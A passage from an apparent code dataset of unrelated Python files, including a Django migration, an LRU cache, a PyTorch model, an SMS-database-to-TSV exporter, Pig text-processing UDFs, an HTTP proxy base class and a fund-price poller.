\",\" + tabBlue2[x] + \"\\n\"\n index += 1\n index = 0\n for x in range(len(tabBlue3)):\n flagString = flagString + \"Blue3,\" + str(x+1) + \",\" + tabBlue3[x] + \"\\n\"\n index += 1\n index = 0\n for x in range(len(tabRed1)):\n flagString = flagString + \"Red1,\" + str(x+1) + \",\" + tabRed1[x] + \"\\n\"\n index += 1\n index = 0\n for x in range(len(tabRed2)):\n flagString = flagString + \"Red2,\" + str(x+1) + \",\" + tabRed2[x] + \"\\n\"\n index += 1\n index = 0\n for x in range(len(tabRed3)):\n flagString = flagString + \"Red3,\" + str(x+1) + \",\" + tabRed3[x] + \"\\n\"\n index += 1\n flaggedOutput.write(flagString)\n flaggedOutput.close()\n break\n elif(userChoice == \"DA\"):\n print(\"Deteting Flags\")\n elif(userChoice == \"F\"):\n tabletFlagged = input(\"What color tablet? (Red or Blue)\\n> \")\n tabletNumber = int(input(\"What number tablet? (1, 2, or 3)\\n> \"))\n if(tabletFlagged.lower() == \"blue\"):\n if(tabletNumber == 1):\n tabBlue1[matchNum-1] = \"F\"\n if(tabletNumber == 2):\n tabBlue2[matchNum-1] = \"F\"\n if(tabletNumber == 3):\n tabBlue3[matchNum-1] = \"F\"\n elif(tabletFlagged.lower() == \"red\"):\n if(tabletNumber == 1):\n tabRed1[matchNum-1] = \"F\"\n if(tabletNumber == 2):\n tabRed2[matchNum-1] = \"F\"\n if(tabletNumber == 3):\n tabRed3[matchNum-1] = \"F\"\n else:\n print(\"Tablet color not valid!\")\n elif(userChoice == \"U\"):\n tabletFlagged = input(\"What color tablet? (Red or Blue)\\n> \")\n tabletNumber = int(input(\"What number tablet? (1, 2, or 3)\\n> \"))\n if(tabletFlagged.lower() == \"blue\"):\n if(tabletNumber == 1):\n tabBlue1[matchNum-1] = \"U\"\n if(tabletNumber == 2):\n tabBlue2[matchNum-1] = \"U\"\n if(tabletNumber == 3):\n tabBlue3[matchNum-1] = \"U\"\n elif(tabletFlagged.lower() == \"red\"):\n if(tabletNumber == 1):\n tabRed1[matchNum-1] = \"U\"\n if(tabletNumber == 2):\n tabRed2[matchNum-1] = \"U\"\n if(tabletNumber == 3):\n tabRed3[matchNum-1] = \"U\"\n else:\n print(\"Tablet color not valid!\")\n open(\"ScoutAdmin.csv\", \"w\").close()\n flaggedOutput = open(\"ScoutAdmin.csv\", \"w\")\n indexauto = 0\n flagString = \"\"\n print(tabBlue1[3])\n for x in range(len(tabBlue1)):\n flagString = flagString + \"Blue1,\" + str(x+1) + \",\" + tabBlue1[x] + \"\\n\"\n indexauto += 1\n indexauto = 0\n for x in range(len(tabBlue2)):\n flagString = flagString + \"Blue2,\" + str(x+1) + \",\" + tabBlue2[x] + \"\\n\"\n indexauto += 1\n indexauto = 0\n for x in range(len(tabBlue3)):\n flagString = flagString + \"Blue3,\" + str(x+1) + \",\" + tabBlue3[x] + \"\\n\"\n indexauto += 1\n indexauto = 0\n for x in range(len(tabRed1)):\n flagString = flagString + \"Red1,\" + str(x+1) + \",\" + tabRed1[x] + \"\\n\"\n indexauto += 1\n indexauto = 0\n for x in range(len(tabRed2)):\n flagString = flagString + \"Red2,\" + str(x+1) + \",\" + tabRed2[x] + \"\\n\"\n indexauto += 1\n indexauto = 0\n for x in range(len(tabRed3)):\n flagString = flagString + \"Red3,\" + str(x+1) + \",\" + tabRed3[x] + \"\\n\"\n indexauto += 1\n flaggedOutput.write(flagString)\n flaggedOutput.close()","sub_path":"EmptyFolder (T)/After/scoutadmin.py","file_name":"scoutadmin.py","file_ext":"py","file_size_in_byte":9055,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"18364347","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('sito', '0003_auto_20150515_1510'),\n ]\n\n operations = [\n migrations.AddField(\n 
model_name='events',\n name='citta',\n field=models.CharField(max_length=255, null=True, verbose_name=b'Citta', blank=True),\n ),\n migrations.AddField(\n model_name='events',\n name='indirizzo',\n field=models.CharField(max_length=255, null=True, verbose_name=b'indirizzo', blank=True),\n ),\n ]\n","sub_path":"sito/migrations/0004_auto_20150515_1514.py","file_name":"0004_auto_20150515_1514.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"11962824","text":"import sys\nsys.path.append('./doubly_linked_list')\nfrom doubly_linked_list import DoublyLinkedList\n\n\nclass LRUCache:\n \"\"\"\n Our LRUCache class keeps track of the max number of nodes it\n can hold, the current number of nodes it is holding, a doubly-\n linked list that holds the key-value entries in the correct\n order, as well as a storage dict that provides fast access\n to every node stored in the cache.\n \"\"\"\n def __init__(self, limit=10):\n self.limit = limit\n # dict = {key : {key: value}} {key: value} is the node\n self.storage = DoublyLinkedList()\n self.quick_access = {}\n\n \"\"\"\n Retrieves the value associated with the given key. Also\n needs to move the key-value pair to the end of the order\n such that the pair is considered most-recently used.\n Returns the value associated with the key or None if the\n key-value pair doesn't exist in the cache.\n \"\"\"\n\n # oldest -> newest\n def get(self, key):\n \n # (key, value) has just been acessed so must be moved to the end\n if key in self.quick_access:\n self.storage.move_to_end(self.quick_access[key])\n # update the link to ensure we are pointing to the right node\n self.quick_access[key] = self.storage.tail\n\n return self.quick_access[key].value['value']\n else:\n return None\n\n \"\"\"\n Adds the given key-value pair to the cache. The newly-\n added pair should be considered the most-recently used\n entry in the cache. If the cache is already at max capacity\n before this entry is added, then the oldest entry in the\n cache needs to be removed to make room. 
Additionally, in the\n case that the key already exists in the cache, we simply\n want to overwrite the old value associated with the key with\n the newly-specified value.\n \"\"\"\n\n # oldest -> newest\n def set(self, key, value):\n\n if key not in self.quick_access:\n \n # if there is room\n if len(self.storage) < self.limit:\n # append it at the end\n self.storage.add_to_tail({'key': key, 'value': value})\n self.quick_access[key] = self.storage.tail\n else:\n # print('no room')\n # no room so erase the first item and append it at end\n del self.quick_access[self.storage.head.value['key']]\n\n self.storage.delete(self.storage.head)\n\n self.storage.add_to_tail({'key': key, 'value': value})\n self.quick_access[key] = self.storage.tail\n else:\n # key already exists so move it from it's old location to the end\n # while updating the value\n\n self.storage.delete(self.quick_access[key])\n\n self.storage.add_to_tail({'key': key, 'value': value})\n self.quick_access[key] = self.storage.tail\n\n def Print(self):\n print()\n print('quick access')\n {print(i, self.quick_access[i].value) for i in self.quick_access}\n print('order')\n tracker = self.storage.head\n while tracker:\n print(tracker.value)\n tracker = tracker.next","sub_path":"lru_cache/lru_cache.py","file_name":"lru_cache.py","file_ext":"py","file_size_in_byte":3221,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"521475508","text":"import torch.nn as nn\nimport torch.nn.functional as F\nimport torch\nimport pdb\nimport math\nimport torchvision.models as torch_models\nimport torch.nn.init as init\nfrom models.Resnet34 import resnet34\nfrom models.resnet import ResNet9\nfrom models.Selayer import SElayer\n\n\n\nclass Model(nn.Module):\n def __init__(self, pretrained=False):\n super(Model, self).__init__()\n self.img_resnet = ResNet9(pretrained)\n self.rp_resnet = ResNet9(pretrained)\n self.sum_resnet = ResNet9(pretrained)\n self.gloabl_resnet = ResNet9(num_classes=2)\n # self.gloabl_resnet = torch_models.resnet34(num_classes=2)\n # single img resnet layer\n self.img_layer0 = self.img_resnet.prep\n self.img_layer1 = self.img_resnet.layer1\n self.img_layer2 = self.img_resnet.layer2\n self.img_selayer = SElayer(256)\n self.img_layer3 = self.img_resnet.layer3\n self.img_fc = nn.Sequential(\n nn.Linear(512, 128, bias=False),\n nn.Sigmoid(),\n nn.Linear(128, 2),\n )\n # rankpooling resnet layer\n self.rp_layer0 = self.rp_resnet.prep\n self.rp_layer1 = self.rp_resnet.layer1\n self.rp_layer2 = self.rp_resnet.layer2\n self.rp_selayer = SElayer(256)\n self.rp_layer3 = self.rp_resnet.layer3\n self.rp_fc = nn.Sequential(\n nn.Linear(512, 128, bias=False),\n nn.Sigmoid(),\n nn.Linear(128, 2),\n )\n # ir resnet layer\n self.sum_layer0 = self.sum_resnet.prep\n self.sum_layer1 = self.sum_resnet.layer1\n self.sum_layer2 = self.sum_resnet.layer2\n self.sum_selayer = SElayer(256)\n self.sum_layer3 = self.sum_resnet.layer3\n self.sum_fc = nn.Sequential(\n nn.Linear(512, 128, bias=False),\n nn.Sigmoid(),\n nn.Linear(128, 2),\n )\n\n self.catConv = nn.Sequential(\n nn.Conv2d(256*2, 256, kernel_size=3, stride=1, padding=1, bias=False),\n nn.BatchNorm2d(256),\n nn.ReLU(inplace=True),\n )\n\n self.cat_layer3 = self.gloabl_resnet.layer3\n #self.cat_layer4 = self.gloabl_resnet.layer4\n\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n # self.fc = nn.Linear(512,2)\n self.fc = nn.Sequential(\n nn.Linear(512, 128, bias=False),\n nn.Sigmoid(),\n nn.Linear(128, 2),\n )\n self._initialize_weights()\n\n def 
_initialize_weights(self):\n for m in self.modules():\n if isinstance(m, nn.Conv2d):\n n = m.kernel_size[0] * m.kernel_size[1] * m.out_channels\n m.weight.data.normal_(0, math.sqrt(2. / n))\n # if m.bias is not None:\n # m.bias.data.zero_()\n elif isinstance(m, nn.BatchNorm2d):\n m.weight.data.fill_(1)\n # m.bias.data.zero_()\n elif isinstance(m, nn.Linear):\n n = m.weight.size(1)\n m.weight.data.normal_(0, 0.01)\n # m.bias.data.zero_()\n\n def forward(self, img, rank_pooling):\n '''\n img shape :[64,3,112,112]\n feat0 shape:[64,64,28,28]\n feat1 shape:[64,64,28,28]\n feat2 shape:[64,128,14,14]\n feat3 shape:[64,128,14,14]\n '''\n bs = img.shape[0]\n img_feat0 = self.img_layer0(img) # [bs,64,112,112]\n img_feat1 = self.img_layer1(img_feat0) # [bs,128,56,56]\n img_feat2 = self.img_layer2(img_feat1) # [bs,256,28,28]\n img_feat3 = self.img_selayer(img_feat2) # [bs,256,28,28]\n img_feat4 = self.img_layer3(img_feat3)\n img_pool = self.avg_pool(img_feat4).view(bs,-1) # [64,512,1,1]\n img_result = self.img_fc(img_pool)\n\n rp_feat0 = self.rp_layer0(rank_pooling)\n rp_feat1 = self.rp_layer1(rp_feat0)\n rp_feat2 = self.rp_layer2(rp_feat1)\n rp_feat3 = self.rp_selayer(rp_feat2)\n rp_feat4 = self.rp_layer3(rp_feat3)\n rp_pool = self.avg_pool(rp_feat4).view(bs,-1)\n rp_result = self.rp_fc(rp_pool)\n\n sum_feat1 = img_feat1+rp_feat1\n sum_feat2 = self.sum_layer2(sum_feat1)\n sum_feat3 = self.sum_layer3(sum_feat2)\n sum_pool = self.avg_pool(sum_feat3).view(bs,-1)\n sum_result = self.sum_fc(sum_pool)\n\n whole_pool = sum_pool+rp_pool+img_pool\n whole_result = self.fc(whole_pool)\n\n #cat_feat = torch.cat((rgb_feat3, depth_feat3, ir_feat3), 1) # [64,640,14,14]\n #cat_feat0 = self.catConv(cat_feat)#[64,128,14,14]\n #cat_feat1 = self.cat_layer3(cat_feat0) # [64,256,7,7]\n #cat_feat3 = self.avg_pool(cat_feat1) # [64,512,1,1]\n\n #cat_fc = cat_feat3.view(cat_feat3.shape[0], -1) # [64,512]\n #result = self.fc(cat_fc) # [64,2]\n\n return whole_result,img_result,rp_result,sum_result\n","sub_path":"models/single_sdnet.py","file_name":"single_sdnet.py","file_ext":"py","file_size_in_byte":4824,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"616734354","text":"import sys\nimport sqlite3\nimport os\nimport json\nimport datetime\nimport urllib\n\nfrom scripts import dbm\nfrom scripts.os_check import SEP\nfrom scripts.utils import ROOT_DIR, mkdir\nOUTPUT = ROOT_DIR\n''' location of databases '''\nsmsdb = ''\n\n\ndef store_sms_messages():\n if os.path.isfile(smsdb):\n sms_conn = sqlite3.connect(smsdb)\n else:\n print(\"smsdb does not exist\")\n return\n\n sms_cursor = sms_conn.cursor()\n sms_query = \"select _id, name, snippet_text, sort_timestamp from conversations order by name, sort_timestamp desc;\"\n sms_cursor.execute(sms_query)\n\n SMS_ID_COL_INDX = 0\n SMS_NAME_COL_INDX = 1\n SMS_SNIPPET_TEXT_COL_INDX = 2\n SMS_SORT_TIMESTAMP_COL_INDX = 3\n\n sms_dict = {}\n\n row = sms_cursor.fetchone()\n while row:\n _id = \" \"\n name = \" \"\n text = \" \"\n timestamp = \" \"\n\n if row[SMS_ID_COL_INDX]:\n _id = row[SMS_ID_COL_INDX]\n\n if row[SMS_NAME_COL_INDX]:\n name = row[SMS_NAME_COL_INDX]\n\n if row[SMS_SNIPPET_TEXT_COL_INDX]:\n text = str(row[SMS_SNIPPET_TEXT_COL_INDX])\n text = text.replace(\"\\r\\n\", \" \")\n text = text.replace(\"\\n\", \" \")\n\n if row[SMS_SORT_TIMESTAMP_COL_INDX]:\n timestamp = row[SMS_SORT_TIMESTAMP_COL_INDX]\n\n sms_dict[row[0]] = (_id, name, text, timestamp)\n\n row = sms_cursor.fetchone()\n\n sms_cursor.close()\n sms_conn.close()\n 
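# Everything below dumps the conversations as one TSV row each; an\n    # illustrative (made-up) row: Alice<TAB>running late, sorry<TAB>2019-05-01T09:30:00\n    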
sms_output_file = OUTPUT + SEP + \"sms.tsv\"\n sms_file = open(sms_output_file, \"w+\", encoding=\"utf-8\")\n sms_file.write(\"name\\ttext\\tsort_timestamp\\n\")\n\n for value in sms_dict:\n\n if sms_dict[value][SMS_SORT_TIMESTAMP_COL_INDX] > 0:\n datetimestr = datetime.datetime.fromtimestamp(\n sms_dict[value][SMS_SORT_TIMESTAMP_COL_INDX] / 1000).strftime('%Y-%m-%dT%H:%M:%S')\n else:\n datetimestr = str(\n sms_dict[value][SMS_SORT_TIMESTAMP_COL_INDX])\n\n sms_file.write(sms_dict[value][SMS_NAME_COL_INDX] + \\\n \"\\t\" + sms_dict[value][SMS_SNIPPET_TEXT_COL_INDX] + \\\n \"\\t\" + datetimestr + \"\\n\")\n print(\"\\n\" + str(len(sms_dict.values())) + \" sms were processed\")\n\n\ndef store_sms_data(session_name):\n global smsdb\n global OUTPUT\n OUTPUT = OUTPUT + SEP + 'data' + SEP + session_name\n smsdb = OUTPUT + SEP + 'db/sms.db'\n OUTPUT = OUTPUT + SEP + 'tsv'\n mkdir(OUTPUT)\n store_sms_messages()\n","sub_path":"scripts/message.py","file_name":"message.py","file_ext":"py","file_size_in_byte":2463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"63136917","text":"import re\nimport csv\nimport sys\nimport datetime\n\n'''\nThis file contains a number of functions that can be called as user-defined\nfunctions in a Pig script, simplifiying much of the logic to do these tasks. \nUnfortunately, many of the functions here seem to execute very slow, and it\nmight be worth looking into alternative ways of processing HBase rows, such\nas using Spark.\n@author Mitch Wagner\n'''\n\n@outputSchema(\"text:chararray\")\ndef getHashtags(text):\n '''\n Extracts the hashtags from the tweet text passed to the function, and\n concatenates all of them with semi-colons.\n '''\n if (text == None):\n return \"\"\n return ';'.join(str(elem) for elem in re.findall(\"(?:\\s|\\A^)[#]+([A-Za-z0-9-_]+)\", text))\n\n@outputSchema(\"text:chararray\")\ndef getMentions(text):\n '''\n Extracts the mentions from the tweet text passed to the function, and\n concatenates all of them with semi-colons.\n '''\n if (text == None):\n return \"\"\n return ';'.join(str(elem) for elem in re.findall(\"(?:\\s|\\A^)[@]+([A-Za-z0-9-_]+)\", text))\n\n@outputSchema(\"text:chararray\")\ndef getRetweetStatus(text):\n '''\n Determines whether or not the tweet whose text was passed to this function\n is a retweet, using a regex to look for the telltale presence of the term\n \"RT\" that indicates this.\n '''\n if (text == None):\n return \"\"\n l = re.findall(\"(?:^|\\s)(RT)[@]?\", text, flags=re.IGNORECASE)\n if len(l) > 0:\n return \"1\"\n else:\n return \"0\"\n\n@outputSchema(\"month:chararray\")\ndef getCreatedMonth(unixtime):\n '''\n Takes in a Unix timestamp, and determines the month that said timestamp\n refers to, returning that value.\n '''\n if (unixtime == None):\n return \"\"\n return datetime.datetime.fromtimestamp(int(unixtime)).strftime(\"%m\")\n\n@outputSchema(\"year:chararray\")\ndef getCreatedYear(unixtime):\n '''\n Takes in a Unix timestamp, and determines the year that said timestamp\n refers to, returning that value. 
\n '''\n if (unixtime == None):\n return \"\"\n return datetime.datetime.fromtimestamp(int(unixtime)).strftime(\"%Y\")\n\n@outputSchema(\"text:chararray\")\ndef removeAtSymbols(text):\n '''\n Removes @ symbols from the text passed to the function, and returns the\n augmented text.\n '''\n if (text == None):\n return \"\"\n return text.replace(\"@\", \"\")\n\n@outputSchema(\"text:chararray\")\ndef removeOctothorpes(text):\n ''' \n Removes octothoropes from the text passed to the function, and returns the\n augmented text. \n '''\n if (text == None):\n return \"\"\n return text.replace(\"#\", \"\")\n\n@outputSchema(\"text:chararray\")\ndef removeBadWords(text):\n '''\n Removes a number of bad words from the text passed to the function,\n returning the augmented text There are likely several words that could be \n added to this list. When adding new words, one must be mindful that\n those words are not subwords of words that are actually appropriate.\n For example, the word 'ass' is actually a subtoken of 'morass', which\n is a perfectly acceptable word, and we are not taking that into \n account here.\n '''\n if (text == None):\n return \"\"\n text = text.replace(\"damn\", \"d**m\")\n text = text.replace(\"bitch\", \"b***h\")\n text = text.replace(\"crap\", \"c**p\")\n text = text.replace(\"piss\", \"p**s\")\n text = text.replace(\"dick\", \"d**k\")\n text = text.replace(\"cunt\", \"c**t\")\n text = text.replace(\"slut\", \"sl*t\")\n text = text.replace(\"shit\", \"sh*t\")\n text = text.replace(\"pussy\", \"p***y\")\n text = text.replace(\"fuck\", \"f**k\")\n text = text.replace(\"ass\", \"a**\")\n return text\n \n@outputSchema(\"text:chararray\")\ndef removeStopWords(text):\n '''\n Removes a number of English stopwords from the text, as given by the\n following resource: http://xpo6.com/list-of-english-stop-words/ \n\n Unlike with the bad words above, we went to the trouble of ensuring that\n only words that exactly match these tokens are replaced, given that\n many of these words are components of larger, more important words.\n Unfortunately, this is a very slow process, likely due to several\n regex replacements, and would be a key target for optimizations.\n '''\n if (text == None):\n return \"\"\n stopwords = [\"a\", \"about\", \"above\", \"above\", \"across\", \"after\",\n \"afterwards\", \"again\", \"against\", \"all\", \"almost\", \"alone\", \"along\", \"already\",\n \"also\",\"although\",\"always\",\"am\",\"among\", \"amongst\", \"amoungst\", \"amount\",\n \"an\", \"and\", \"another\", \"any\",\"anyhow\",\"anyone\",\"anything\",\"anyway\",\n \"anywhere\", \"are\", \"around\", \"as\", \"at\", \"back\",\"be\",\"became\",\n \"because\",\"become\",\"becomes\", \"becoming\", \"been\", \"before\", \"beforehand\",\n \"behind\", \"being\", \"below\", \"beside\", \"besides\", \"between\", \"beyond\", \"bill\",\n \"both\", \"bottom\",\"but\", \"by\", \"call\", \"can\", \"cannot\", \"cant\", \"co\", \"con\",\n \"could\", \"couldnt\", \"cry\", \"de\", \"describe\", \"detail\", \"do\", \"done\", \"down\",\n \"due\", \"during\", \"each\", \"eg\", \"eight\", \"either\", \"eleven\",\"else\", \"elsewhere\",\n \"empty\", \"enough\", \"etc\", \"even\", \"ever\", \"every\", \"everyone\", \"everything\",\n \"everywhere\", \"except\", \"few\", \"fifteen\", \"fify\", \"fill\", \"find\", \"fire\",\n \"first\", \"five\", \"for\", \"former\", \"formerly\", \"forty\", \"found\", \"four\", \"from\",\n \"front\", \"full\", \"further\", \"get\", \"give\", \"go\", \"had\", \"has\", \"hasnt\", \"have\",\n \"he\", 
\"hence\", \"her\", \"here\", \"hereafter\", \"hereby\", \"herein\", \"hereupon\",\n \"hers\", \"herself\", \"him\", \"himself\", \"his\", \"how\", \"however\", \"hundred\", \"ie\",\n \"if\", \"in\", \"inc\", \"indeed\", \"interest\", \"into\", \"is\", \"it\", \"its\", \"itself\",\n \"keep\", \"last\", \"latter\", \"latterly\", \"least\", \"less\", \"ltd\", \"made\", \"many\",\n \"may\", \"me\", \"meanwhile\", \"might\", \"mill\", \"mine\", \"more\", \"moreover\", \"most\",\n \"mostly\", \"move\", \"much\", \"must\", \"my\", \"myself\", \"name\", \"namely\", \"neither\",\n \"never\", \"nevertheless\", \"next\", \"nine\", \"no\", \"nobody\", \"none\", \"noone\",\n \"nor\", \"not\", \"nothing\", \"now\", \"nowhere\", \"of\", \"off\", \"often\", \"on\", \"once\",\n \"one\", \"only\", \"onto\", \"or\", \"other\", \"others\", \"otherwise\", \"our\", \"ours\",\n \"ourselves\", \"out\", \"over\", \"own\",\"part\", \"per\", \"perhaps\", \"please\", \"put\",\n \"rather\", \"re\", \"same\", \"see\", \"seem\", \"seemed\", \"seeming\", \"seems\", \"serious\",\n \"several\", \"she\", \"should\", \"show\", \"side\", \"since\", \"sincere\", \"six\", \"sixty\",\n \"so\", \"some\", \"somehow\", \"someone\", \"something\", \"sometime\", \"sometimes\",\n \"somewhere\", \"still\", \"such\", \"system\", \"take\", \"ten\", \"than\", \"that\", \"the\",\n \"their\", \"them\", \"themselves\", \"then\", \"thence\", \"there\", \"thereafter\",\n \"thereby\", \"therefore\", \"therein\", \"thereupon\", \"these\", \"they\", \"thickv\",\n \"thin\", \"third\", \"this\", \"those\", \"though\", \"three\", \"through\", \"throughout\",\n \"thru\", \"thus\", \"to\", \"together\", \"too\", \"top\", \"toward\", \"towards\", \"twelve\",\n \"twenty\", \"two\", \"un\", \"under\", \"until\", \"up\", \"upon\", \"us\", \"very\", \"via\",\n \"was\", \"we\", \"well\", \"were\", \"what\", \"whatever\", \"when\", \"whence\", \"whenever\",\n \"where\", \"whereafter\", \"whereas\", \"whereby\", \"wherein\", \"whereupon\",\n \"wherever\", \"whether\", \"which\", \"while\", \"whither\", \"who\", \"whoever\", \"whole\",\n \"whom\", \"whose\", \"why\", \"will\", \"with\", \"within\", \"without\", \"would\", \"yet\",\n \"you\", \"your\", \"yours\", \"yourself\", \"yourselves\", \"the\"]\n\n for word in stopwords:\n rgx = re.compile(r\"\\b\" + word + r\"\\b\")\n text = rgx.sub(\"\", text)\n \n return text \n\n\n \n","sub_path":"tweet-processing/pipeline/process-pig.py","file_name":"process-pig.py","file_ext":"py","file_size_in_byte":7435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"619454240","text":"from ProxyBoyLogger import ProxyBoyLogger\nfrom http import HTTPStatus\nfrom http.server import BaseHTTPRequestHandler\nfrom urllib.parse import urlparse\nimport errno\nimport socket\n\nclass ProxyBoyBase(BaseHTTPRequestHandler):\n def __init__(self, request, client_address, server, LoggerClass=ProxyBoyLogger):\n self.logger = LoggerClass( self )\n self._headers_buffer = [] # Needed to not error out. 
Did I accidentally delete the headers buffer?\n self._general_header_exclude = [\n ('Connection', 'keep-alive'),\n ('Proxy-Connection', 'keep-alive'),\n ]\n self._response_header_exclude = [\n 'Server',\n 'Date',\n 'Transfer-Encoding'\n ]\n super(ProxyBoyBase, self).__init__(request, client_address, server)\n\n def clear_headers_buffer(self):\n \"\"\"\n Clears the headers buffer in this request handler in a way that doesn't write out to our wfile\n \"\"\"\n self._headers_buffer = []\n return\n\n def do_PROXY(self):\n \"\"\"\n Performed on requests in which we want to read information\n \"\"\"\n pass\n\n def do_CONNECT(self):\n \"\"\"\n Performed on requests in which we respect tunneling protocol\n \"\"\"\n pass\n\n def log_message(self, format, *args):\n self.logger.log_proxy_boy_message( format, *args )\n return\n\n def log_error(self, format, *args):\n self.logger.log_proxy_boy_message( format, *args, title=\"ERROR\")\n\n def log_request(self, code='-', size='-', requestline=None):\n \"\"\"Log an accepted request.\n\n This is called by send_response().\n\n \"\"\"\n if isinstance(code, HTTPStatus):\n code = code.value\n\n if not requestline:\n requestline = self.requestline\n\n self.logger.log_proxy_boy_request('\"%s\" %s %s', requestline, str(code), str(size))\n return\n\n def log_response(self, headers):\n self.logger.log_proxy_boy_request('''\n\n''',\n )\n\n def get_a_port(self, parsed_url):\n \"\"\"Returns a port that is either the default, or a port given in a urlparse() string.\n \"\"\"\n port = parsed_url.port\n\n # Search through to find a port string\n if not port:\n port = parsed_url.path.split(':')[-1:][0]\n\n if not port or (port == parsed_url.path):\n port = 80\n\n return port\n\n def get_client_url(self):\n \"\"\"Builds and sanitizes the client url string so that we can use it\n in subsequent requests.\n \"\"\"\n client_host=self.requestline.split(\" \")[1]\n ssl = False\n parsed_url = urlparse(client_host, 'http')\n port = self.get_a_port(parsed_url)\n\n if port == '443':\n ssl = True\n\n print(\"PARSED URL\")\n print(parsed_url)\n\n if not parsed_url.netloc:\n sanitized_url = \":\".join(parsed_url.path.split(':')[:-1])\n\n if not sanitized_url:\n sanitized_url = parsed_url.path\n\n if ssl:\n parsed_url = parsed_url._replace(scheme='https')\n parsed_url = parsed_url._replace(netloc=f\"{sanitized_url}:{port}\")\n parsed_url = parsed_url._replace(path=\"\")\n return parsed_url.geturl()\n\n def handle_one_request(self):\n \"\"\"Handle a single HTTP request.\n You normally don't need to override this method; see the class\n __doc__ string for information on how to handle specific HTTP\n commands such as GET and POST.\n \"\"\"\n try:\n self.raw_requestline = self.rfile.readline(65537)\n if len(self.raw_requestline) > 65536:\n self.requestline = ''\n self.request_version = ''\n self.command = ''\n self.send_error(HTTPStatus.REQUEST_URI_TOO_LONG)\n return\n if not self.raw_requestline:\n self.close_connection = True\n return\n if not self.parse_request():\n # An error code has been sent, just exit\n return\n if self.command == \"CONNECT\":\n self.do_CONNECT()\n else:\n self.do_PROXY()\n # Do a proxy. With ProxyBoy.\n self.wfile.flush() #actually send the response if not already done.\n except socket.timeout as e:\n #a read or a write timed out. 
Discard this connection\n            self.log_error(\"Request timed out: %r\", e)\n            self.close_connection = True\n            return\n        except IOError as e:\n            if e.errno == errno.EPIPE:\n                self.log_error(\"Pipe broken: Trying to perform operations on a closed connection\")","sub_path":"ProxyBoyBase.py","file_name":"ProxyBoyBase.py","file_ext":"py","file_size_in_byte":4732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"615977828","text":"# Functions\nimport record\nimport pandas as pd\nimport pyttsx3\neng = pyttsx3.init()\neng.say(\"This is the Functions module\")\neng.runAndWait()\nimport_file_path = \"functions.xlsx\"\nvoice_input = record.recorder().lower()\nprint(voice_input)\ndf = pd.read_excel(import_file_path)\nprint(df)\nvariable_commands_list = df['function_Declaration'].tolist()\nprint(type(variable_commands_list[0]))\n# function_name may never be set if nothing function-related is heard,\n# so initialise it and guard the final print against a NameError.\nfunction_name = None\nfor element in variable_commands_list:\n    ele = element.lower()\n    if \"function\" in ele:\n        print(\"Function command detected\")\n        if \"define a function\" in voice_input:\n            print(voice_input[19:])\n            input_list = voice_input.split()\n            function_ind = input_list.index(\"function\")\n            type_ind = input_list.index(\"type\")\n            function_name = input_list[type_ind+1] + \" \" + input_list[function_ind+1]\n        else:\n            print(\"Nothing related to function\")\nif function_name:\n    print(\"Code Block: \")\n    print(function_name)\n","sub_path":"functionscpp.py","file_name":"functionscpp.py","file_ext":"py","file_size_in_byte":947,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"63"} +{"seq_id":"312789363","text":"#!winpty python\n# -*- coding: utf-8 -*-\n\nclass Unbuffered(object):\n    def __init__(self, stream):\n        self.stream = stream\n    def write(self, data):\n        self.stream.write(data)\n        self.stream.flush()\n    def writelines(self, datas):\n        self.stream.writelines(datas)\n        self.stream.flush()\n    def __getattr__(self, attr):\n        return getattr(self.stream, attr)\n\nfrom datetime import datetime, timedelta\nimport sys, os, http.client, json, time, winsound\n\nsys.stdout = Unbuffered(sys.stdout)\n\nto_date = datetime.today()\nfrom_date = to_date - timedelta(days=14) # 14 days back is long enough for long public holidays close.\n\nfund_conn = http.client.HTTPConnection('www.fullgoal.com.cn', timeout=5)\n\nwhile True:\n    try:\n        fund_conn.request(\"GET\", \"/chart-web/chart/fundnetchart!getFundNetChartJson\"\n                          \"?fundcode=001510&from=%s&to=%s&charttype=2&show=1\"\n                          \"&titleflag=1&siteId=ea9e215cce3342d3b40721461cd1572d\"\n                          % (from_date.strftime('%Y-%m-%d'), to_date.strftime('%Y-%m-%d')))\n        resp_c = json.loads(fund_conn.getresponse().read())\n\n        # if the last net value is today's (within 1 day), it means we get the update.\n        if timedelta(days=1) > (to_date - datetime.strptime(resp_c['xAxisData'][-1], '%Y-%m-%d')):\n            print('\\n>>> Eureka! 
<<<')\n fund_conn.request(\"GET\", \"/chart-web/chart/fundnetchart!getFundNetChartJson\"\n \"?fundcode=001508&from=%s&to=%s&charttype=2&show=1\"\n \"&titleflag=1&siteId=ea9e215cce3342d3b40721461cd1572d\"\n % (from_date.strftime('%Y-%m-%d'), to_date.strftime('%Y-%m-%d')))\n resp_a = json.loads(fund_conn.getresponse().read())\n break\n #else:\n #print(resp_c)\n\n print('.', end='')\n time.sleep(60)\n except http.client.RemoteDisconnected:\n print('_', end='')\n time.sleep(120)\n\nvalue_today = float(resp_a['seriesData0'][-1])\nvalue_yestoday = float(resp_a['seriesData0'][-2])\ndaily_adjustment = (value_today - value_yestoday) / value_yestoday * 100\nprint(\"[%s] %.4f -> %.4f 富国新动力A -> 日涨跌: %.4f%%\"\n % (datetime.today(), value_yestoday, value_today, daily_adjustment))\n\nvalue_today = float(resp_c['seriesData0'][-1])\nvalue_yestoday = float(resp_c['seriesData0'][-2])\ndaily_adjustment = (value_today - value_yestoday) / value_yestoday * 100\nprint(\"[%s] %.4f -> %.4f 富国新动力C -> 日涨跌: %.4f%%\"\n % (datetime.today(), value_yestoday, value_today, 